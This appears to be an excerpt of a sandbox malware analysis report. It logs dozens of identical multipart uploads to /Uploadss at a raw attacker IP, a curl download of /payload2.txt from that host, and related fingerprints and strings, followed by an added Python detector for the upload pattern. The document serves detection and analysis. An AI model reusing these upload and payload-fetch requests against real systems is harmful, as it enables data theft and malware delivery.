Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------b615441db0569974
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------c38b6efbb3860b55
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------e120409de9b0961d
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------df56891ade3f02b5
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------5b9a6ba60e763601
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------6125ed5460a004ed
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------0cd032303c66daa3
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------4103ce5fab37505e
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------e9d6222010bc4b93
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------2aa72388551e1719
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------77f946c49d2aa0aa
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------23ddd58ceee731b1
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------b152df86b4cdc780
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------2d6437b9e8f9fa26
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------f9fda7251b3940ec
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------b875c75c93bfafb2
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------90b1444f43bf87bb
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------f596c2ad5c87a402
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------eebee10a2c2a0a7e
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------fb127d9661ca100d
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------6653a23fed80a45e
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------37776beab8920800
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------40df58b3406d3c6c
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------7048acb243c73c53
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------915bf5cdc8e28206
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------b29bc1940f1b3cf8
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------faed09c6aeddfcad
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------9e028a09e8444741
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------1ebd341a5c4734af
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------0a25b701dad0bb75
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------917bcfd4af7652d9
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------3755ae52020b6387
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------5781aa9441631b3e
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------f897addde1370454
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------793f3f5fb8213a21
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------79bb560cb57ad0e1
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------a317104ee2cc8105
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------883a00c3844ef429
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------57415b48de4d495c
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------3cce8b88a3742ee2
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------b2be66a73755a4fd
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------25a531a286c8b417
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------01eb8640365fd751
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------6f4cfa28ab6b91ba
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------0f60835c471703b6
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------30e95938f8d682b4
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------fa71821352b7a857
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------1d41fea49894b271
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------4c1e4f796c2c9c93
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------fff4f274d4698b1d
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------edd5ebff721373ff
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------e20020832d30f3c0
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------d4472314239c3705
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------7e127aa7b6ef26df
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------0cf99223c92232cd
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------7ce2fb84c3dc7384
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------d8f7e01a7de6f04f
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------f7a61e38904fcff7
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------8977623888b015d2
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------8961b875dcb6c2ce
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------00f564c0c06baa17
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------eaaf87d8ac660071
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------4db416eccd57981d
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------6ea26e32a284dc76
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------4be51b091cf7dce2
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------fffb92063f61af58
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------bcadf6652bcb5995
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------a0c3d46717813838
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------71e83fa42945e82e
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------2774b4aa52ecef71
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------9299cdde274089f9
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------32889ea7ae55e121
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------a678ad0b838c4a42
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------271c99aa13addee5
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------4d702bb6621a98ce
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------3ff2595632dfd343
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------6be2ae2c8e7d9a07
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------5287d62a7467fc4e
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------124d7d68b6a08cfd
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------837b5fa459944e4b
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------22f31a976d8ccacd
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------adf6f33d0b6a389e
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------69954c1bb23fa243
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------54f15fd9c89287c7
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------862973e7d8c5e47a
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------218f885d1d1b01f5
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------21ef4c783e5ef6a8
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------8d935b7ab73db626
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3e1bcbfd1ac49b71
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------453e0988638a690b
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------936caa563e76ca26
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------96aa930188ad95d0
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1c10b124588ac309
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7cef968b537d35d7
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------cd9315d0f70306a2
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1e25afe42fd86294
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------01894383c334ebcc
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2c7fc54d6c7c04d4
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------bb4d8fe5f94a83f5
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a9d83593ce6d0496
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d2c48da37d466a87
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------450e1ee269f45e90
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0089c8439ef77124
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6e3e4c3b05a79857
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------521206e0c9b94cee
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3e6e6e56ae2cb74d
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------03a4310a76240f87
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0eac6bd829619dc3
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7554e3942a8f0809
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f183d5370c54fe4b
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------ca18e54d06119b02
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------998ba500316220a8
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2680bd2607a01273
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------03efbda4d78b7cdf
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a35d77128ae5cf6a
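The block of POSTs above is the exfiltration channel: the same 1456-byte multipart body, a fresh boundary each time, sent dozens of times to a raw IP on port 5000 with no DNS lookup, which is consistent with a larger blob being pushed in fixed-size chunks. The following detector, added here as an example and not part of the Joe Sandbox report, groups request lines by destination and flags that combination. The sample lines are constructed to mimic the report's flattened request format (header values run straight into the next header name), and the port list and the three-request minimum are this example's own assumptions.

```python
"""
Added example, not part of the Joe Sandbox report: a small detector for the
upload pattern shown above (dozens of identical-size multipart POSTs to a raw
IP on a non-standard port). The sample lines are constructed to mimic the
report's flattened request format; the thresholds are this example's own.
"""
import re
from collections import defaultdict
from ipaddress import ip_address

# Constructed sample in the report's flattened "method path HTTP/1.xHeader: value..." form.
SAMPLE_LOG = """\
POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------aaaa000000000001
POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------aaaa000000000002
POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------aaaa000000000003
GET /payload2.txt HTTP/1.1Host: 172.104.160.126:8099User-Agent: curl/7.83.1Accept: */*
POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*Content-Length: 4722Host: login.live.com
"""

STANDARD_PORTS = {80, 443, 8080}  # assumption: what "standard" means for this check


def parse_request(line):
    """Parse one flattened request line into a dict, or None if it is not a request."""
    m = re.match(r'^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]', line)
    if not m:
        return None
    req = m.groupdict()
    # Header values run straight into the next header name in this format, so
    # hostnames are matched on lowercase/digit/dot/hyphen only.
    host = re.search(r'Host: (?P<host>[a-z0-9.\-]+)(?::(?P<port>\d+))?', line)
    req['host'] = host.group('host') if host else None
    req['port'] = int(host.group('port')) if host and host.group('port') else 80
    length = re.search(r'Content-Length: (\d+)', line)
    req['length'] = int(length.group(1)) if length else None
    ctype = re.search(r'Content-Type: ([a-z0-9/+.\-]+)', line)
    req['ctype'] = ctype.group(1) if ctype else None
    return req


def is_raw_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def find_exfil(log_text, min_posts=3):
    """Group POSTs by (host, port, path) and report groups that look like chunked uploads."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        req = parse_request(line.strip())
        if req and req['method'] == 'POST':
            groups[(req['host'], req['port'], req['path'])].append(req)

    findings = []
    for (host, port, path), reqs in groups.items():
        if len(reqs) < min_posts:
            continue
        reasons = []
        if is_raw_ip(host):
            reasons.append('host is a raw IP, no DNS lookup needed')
        if port not in STANDARD_PORTS:
            reasons.append(f'HTTP on non-standard port {port}')
        sizes = {r['length'] for r in reqs}
        if len(sizes) == 1 and all(r['ctype'] == 'multipart/form-data' for r in reqs):
            reasons.append(f'{len(reqs)} multipart uploads of identical size {next(iter(sizes))} bytes')
        if reasons:
            findings.append({'host': host, 'port': port, 'path': path,
                             'count': len(reqs), 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in find_exfil(SAMPLE_LOG):
        print(f"{f['host']}:{f['port']}{f['path']} x{f['count']}")
        for r in f['reasons']:
            print('  -', r)
```

On the sample, only the /Uploadss group is reported; the single login.live.com POST never reaches the three-request minimum, and the curl GET to port 8099 is not a POST (it is the payload download, covered separately below in the report). The identical Content-Length is the strongest of the three signals: a legitimate form upload varies in size, a chunked file transfer does not until its last piece.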
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49772 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_0087D8C0 recv,WSAGetLastError, 13_2_0087D8C0
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PxRdW7mlrrw49Sf&MD=a2PwAHxG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PxRdW7mlrrw49Sf&MD=a2PwAHxG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /payload2.txt HTTP/1.1Host: 172.104.160.126:8099User-Agent: curl/7.83.1Accept: */*
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: Usage: curl [options...] <url>
